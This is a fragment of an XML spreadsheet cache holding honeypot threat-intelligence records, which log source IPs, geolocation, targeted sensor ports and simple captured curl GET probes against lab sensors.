    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H22&amp;&amp;SMA-LAB_POSTGRES_H40&amp;&amp;SMA-LAB_SOCKS5_H43&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_HTTP_H23&amp;&amp;SMA-LAB_SMB_H36&amp;&amp;SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H20"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;5432&amp;&amp;1080&amp;&amp;5900&amp;&amp;80&amp;&amp;445&amp;&amp;54370&amp;&amp;23&amp;&amp;44527&amp;&amp;38566&amp;&amp;38594&amp;&amp;37067&amp;&amp;37092&amp;&amp;27396&amp;&amp;37106&amp;&amp;9100&amp;&amp;1798"/>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2003-06-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc85:ab16"/>
    <s v="C-I_D"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3780"/>
    <x v="3780"/>
    <s v="125-229-225-159.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T12:27:19"/>
    <d v="2024-05-28T04:14:56"/>
    <d v="2025-04-01T12:27:19"/>
    <n v="614"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_SSH_H1&amp;&amp;SMA-LAB_MT-CPA_H5&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H5"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;22&amp;&amp;29137&amp;&amp;23&amp;&amp;9100&amp;&amp;48493&amp;&amp;53621"/>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NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>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None"/>
    <x v="31"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:7de5:e19f"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3781"/>
    <x v="3781"/>
    <s v="114-34-141-233.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T12:26:39"/>
    <d v="2024-08-14T11:37:26"/>
    <d v="2025-04-01T12:26:39"/>
    <n v="658"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H20&amp;&amp;SMA-LAB_SSH_H40&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H15"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;22&amp;&amp;23&amp;&amp;9100"/>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GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP: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7222:8de9"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3782"/>
    <x v="3782"/>
    <s v="NA&amp;&amp;1-34-126-178.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-01T12:25:57"/>
    <d v="2024-10-28T09:30:38"/>
    <d v="2025-04-01T12:25:57"/>
    <n v="446"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_MT-CPA_H5&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H15"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;80&amp;&amp;36808&amp;&amp;22573&amp;&amp;NA&amp;&amp;9100"/>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None"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;GET&amp;&amp;NA&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:122:7eb2"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3783"/>
    <x v="3783"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T12:19:24"/>
    <d v="2025-03-31T23:55:26"/>
    <d v="2025-04-01T12:19:24"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H39"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Connaught Lane)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6306"/>
    <s v="77.2239"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BSNL-GSM-SouthZone"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d1:9148"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3784"/>
    <x v="3784"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T12:18:26"/>
    <d v="2025-04-01T12:18:26"/>
    <d v="2025-04-01T12:18:26"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="KKC"/>
    <s v="Kowloon City"/>
    <s v="NA"/>
    <s v="Kowloon"/>
    <s v="1819609"/>
    <s v="NA"/>
    <s v="22.3144"/>
    <s v="114.22"/>
    <s v="17924"/>
    <s v="SMARTONE-MB-AS-AP"/>
    <s v="Smartone"/>
    <s v="consumer"/>
    <s v="Smartone Mobile communications Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b698:a25"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3785"/>
    <x v="3785"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T12:11:16"/>
    <d v="2025-04-01T12:11:16"/>
    <d v="2025-04-01T12:11:16"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Pool Through BSNL"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:783c:2644"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3786"/>
    <x v="3786"/>
    <s v="NA&amp;&amp;220-133-83-143.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-01T12:02:32"/>
    <d v="2023-12-02T07:53:00"/>
    <d v="2025-04-01T12:02:32"/>
    <n v="381"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H41"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;54860&amp;&amp;23&amp;&amp;47783&amp;&amp;47799&amp;&amp;80&amp;&amp;9100&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2003-06-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;GET&amp;&amp;NA&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc85:538f"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3787"/>
    <x v="3787"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T11:55:35"/>
    <d v="2025-04-01T11:53:15"/>
    <d v="2025-04-01T11:55:35"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="business"/>
    <s v="NIB"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c6:6432"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3788"/>
    <x v="3788"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T11:48:22"/>
    <d v="2024-09-09T21:41:00"/>
    <d v="2025-04-01T11:48:22"/>
    <n v="301"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H21&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_MT-CPA_H37&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H28"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;23&amp;&amp;54290&amp;&amp;NA&amp;&amp;9100"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="BD"/>
    <s v="Bangladesh"/>
    <s v="C"/>
    <s v="Dhaka Division"/>
    <s v="Dhaka"/>
    <s v="Dhaka (Mohammadpur)"/>
    <s v="1185241"/>
    <s v="1207"/>
    <s v="23.7639"/>
    <s v="90.3707"/>
    <s v="24342"/>
    <s v="BRACNet Limited"/>
    <s v="BRACNet Limited"/>
    <s v="business"/>
    <s v="bracNet"/>
    <s v="2008-08-12"/>
    <s v="BBN-BD"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:737f:517a"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3789"/>
    <x v="3789"/>
    <s v="114-34-92-17.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T11:47:11"/>
    <d v="2024-07-25T23:01:15"/>
    <d v="2025-04-01T11:47:11"/>
    <n v="428"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H27&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H20"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;23&amp;&amp;54680&amp;&amp;47097&amp;&amp;47120&amp;&amp;9100&amp;&amp;45098"/>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2008-04-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;GET&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <x v="1"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:7222:5c11"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3790"/>
    <x v="3790"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T11:29:18"/>
    <d v="2024-11-30T12:33:37"/>
    <d v="2025-04-01T11:29:18"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
